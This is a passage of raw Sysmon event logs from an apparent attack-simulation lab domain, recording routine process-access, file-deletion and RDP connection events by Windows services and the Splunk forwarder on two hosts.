09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048188Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048187Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048186Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048185Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048184Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048183Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048182Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048181Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048180Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048179Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048178Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048177Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048176Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048175Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.152{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34A27FA10D8A00E3FCADB068255C2333,SHA256=E73E55E0F358C8AECDE4A9E04B5B83CAE827749104E5C06C99B6D6C4BEFBD608,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048174Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.152{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14C7CF9FA928B0B43A004D3682E2F7D0,SHA256=ABC67DAC76D693F703B3791CE43760D0FEFC96D41012A01B0D3005A8D0881DB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976820Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.624{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=07476DAA97103EA2DEBA1A400AF3971A,SHA256=C9F0BD4896E2831FE7CFEE3F1A3875F863377B14CC0CB1DA0FAEB122CB385B2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976819Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.624{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0146DB2FA312C66635AB53692EC2B2E4,SHA256=9607E107179FE4CAD5C4C181E0C99D0FE5574380FCA7F9C0373A6C0F6A758DB8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976818Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.009{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-57054-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000976817Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.343{69CF5F33-88A5-6151-8679-00000000FD01}40283208C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976816Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.187{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88A5-6151-8679-00000000FD01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976815Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.187{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976814Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.187{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976813Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.187{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976812Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.187{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976811Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.187{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976810Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.187{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976809Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.187{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976808Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.187{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976807Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.187{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976806Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.187{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-88A5-6151-8679-00000000FD01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976805Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.171{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88A5-6151-8679-00000000FD01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 